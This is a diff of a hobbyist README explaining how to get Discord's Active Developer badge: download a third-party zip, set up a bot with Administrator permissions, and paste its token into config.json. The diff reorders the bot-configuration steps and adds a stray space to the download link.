lepex1/ENG-Discord-Developer-Badge/README.md

 # Hello!
 Today I will tell you how to get an active developer badge in the discord
 ![Alt-Developer Badge](https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcREt6DJ1OVMmDZCze67sft2tRlgaBSR1Ifyf97F8zxUqQ&s)

 ## Note!
 GitHub cannot accept more than 100 files.
 I have a lot of them.
 I did not upload them to this repository again.
-Click on the link (https://github.com/toptipus/activedeveloper/archive/refs/heads/main.zip) and download all the files from here.
+Click on the link (https://github.com/toptipus/activedeveloper/archive/refs/heads/main .zip) and download all the files from here.

 ### 1. Create and configure a bot
 You need to create a reid bot by following the link (https://discord.com/developers/applications ).
 Click "New Applications", write the name and check the box.
+In the column on the left, select "Bot".
+There we put all sliders on except "REQUIRES OAUTH2 CODE GRANT" and check the box next to "Administrator" below.
+At the very top of the page, click "Reset token".
 Next, we need to go to the tab in the column on the left "OAuth2"-"URL Generator".
 Among the buttons with ticks, we look for "bot" and poke to put a tick.
 Even lower in the "SELECT REDIRECT URL" window, select.
 Select "Administrator" below.
 Next, we generate a link to the bot.
 Click on the link and add the bot to your private discord server.
-In the column on the left, select "Bot".
-There we put all the sliders on and check the box next to "Administrator" below.
-At the very top of the page, click "Reset token".

 ### 2. Config.json
 Copy the token and go to the file "config.json".